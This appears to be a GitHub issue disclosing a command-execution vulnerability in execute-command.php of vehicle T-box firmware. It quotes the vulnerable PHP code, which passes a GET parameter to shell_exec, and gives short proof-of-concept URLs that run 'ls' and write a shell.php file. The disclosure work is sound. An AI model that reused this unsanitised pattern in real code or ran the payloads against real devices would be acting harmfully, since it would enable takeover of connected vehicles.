Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

execute-command.php Command execution vulnerability #1

Open
xiaoming-king opened this issue Feb 14, 2023 · 0 comments
Open

execute-command.php Command execution vulnerability #1

xiaoming-king opened this issue Feb 14, 2023 · 0 comments

Comments

@xiaoming-king
Copy link

xiaoming-king commented Feb 14, 2023

The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware
Vulnerability type: command execution

This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous
下载
下载

`<?php

$command = $_GET['command'];
$output = shell_exec($command);

echo $output;

?>
`
Through shell_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer

Vulnerability exploitation process:
Pass the parameter command to the shell through get_ Exec for command execution and final output

POC:
/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php

Example:
http://192.168.160.128:7777/execute-command.php?command=ls
image

/execute-command.php?command=echo "" > shell.php
image
image
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.

# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant